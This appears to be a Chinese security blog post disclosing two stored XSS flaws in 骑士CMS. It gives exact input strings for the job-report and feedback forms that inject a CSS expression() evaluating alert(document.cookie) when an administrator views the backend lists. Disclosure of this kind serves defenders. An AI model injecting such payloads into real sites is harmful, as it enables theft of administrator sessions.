骑士CMS存储型XSS两枚专打管理员

  • A+
所属分类:漏洞时代
摘要

1. 首页>招聘信息>职位详情在页面里面可以看到“举报”点击举报,输入:
[php]
我要举报这个骗人的职位,这家公司是流氓什么什么什么什么什么” style=”a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))” a=”
[/php]

后台管理员进入举报列表页面即中招。

2. 每个页面都可以看到“我要建议”的那个图标,点击提交建议:
[php]
意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意” style=”a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))” a=”a
[/php]

后台管理员进入建议列表页面即中招。

1. 首页>招聘信息>职位详情

在页面里面可以看到“举报”

点击举报,输入:
<br /> 我要举报这个骗人的职位,这家公司是流氓什么什么什么什么什么" style="a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))" a="<br />
骑士CMS存储型XSS两枚专打管理员
后台管理员进入举报列表页面即中招。
骑士CMS存储型XSS两枚专打管理员
2. 每个页面都可以看到“我要建议”的那个图标,点击提交建议:
<br /> 意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意" style="a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))" a="a<br />
骑士CMS存储型XSS两枚专打管理员
后台管理员进入建议列表页面即中招。
骑士CMS存储型XSS两枚专打管理员

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: